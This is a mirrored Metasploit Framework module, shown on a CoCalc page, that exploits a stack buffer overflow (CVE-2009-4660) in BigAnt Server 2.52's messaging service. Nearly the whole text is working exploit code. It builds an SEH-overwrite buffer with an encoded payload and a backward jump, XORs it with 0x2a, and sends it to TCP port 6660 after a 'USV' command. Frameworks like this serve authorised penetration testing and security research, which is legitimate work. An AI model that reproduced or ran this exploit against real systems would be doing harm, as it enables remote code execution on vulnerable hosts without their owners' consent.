Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/bigant_server_usv.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',

17
        'Description' => %q{

18
          This exploits a stack buffer overflow in the BigAnt Messaging Service,

19
          part of the BigAnt Server product suite. This module was tested

20
          successfully against version 2.52.

21


22
          NOTE: The AntServer service does not restart, you only get one shot.

23
        },

24
        'Author' => [

25
          'Lincoln',

26
          'DouBle_Zer0',

27
          'jduck'

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'CVE', '2009-4660' ],

32
          [ 'OSVDB', '61386' ],

33
          [ 'EDB', '10765' ],

34
          [ 'EDB', '10973' ]

35
        ],

36
        'Privileged' => true,

37
        'DefaultOptions' => {

38
          'EXITFUNC' => 'seh',

39
        },

40
        'Payload' => {

41
          'Space' => (218 + 709 + 35),

42
          'BadChars' => "\x2a\x20\x27\x0a\x0f",

43
          # pre-xor with 0x2a:

44
          # 'BadChars' => "\x00\x0a\x0d\x20\x25",

45
          'StackAdjustment' => -3500,

46
        },

47
        'Platform' => 'win',

48
        'Targets' => [

49
          [ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3

50
        ],

51
        'DefaultTarget' => 0,

52
        'DisclosureDate' => '2009-12-29',

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60


61
    register_options([Opt::RPORT(6660)])

62
  end

63


64
  def exploit

65
    connect

66


67
    sploit = ""

68
    sploit << payload.encoded

69
    sploit << generate_seh_record(target.ret)

70
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + payload_space.to_s).encode_string

71
    sploit << rand_text_alphanumeric(3)

72
    sploit << [0xdeadbeef].pack('V') * 3

73


74
    # the buffer gets xor'd with 0x2a !

75
    sploit = sploit.unpack("C*").map { |c| c ^ 0x2a }.pack("C*")

76


77
    print_status("Trying target #{target.name}...")

78
    sock.put("USV " + sploit + "\r\n\r\n")

79


80
    handler

81
    disconnect

82
  end

83
end

84


85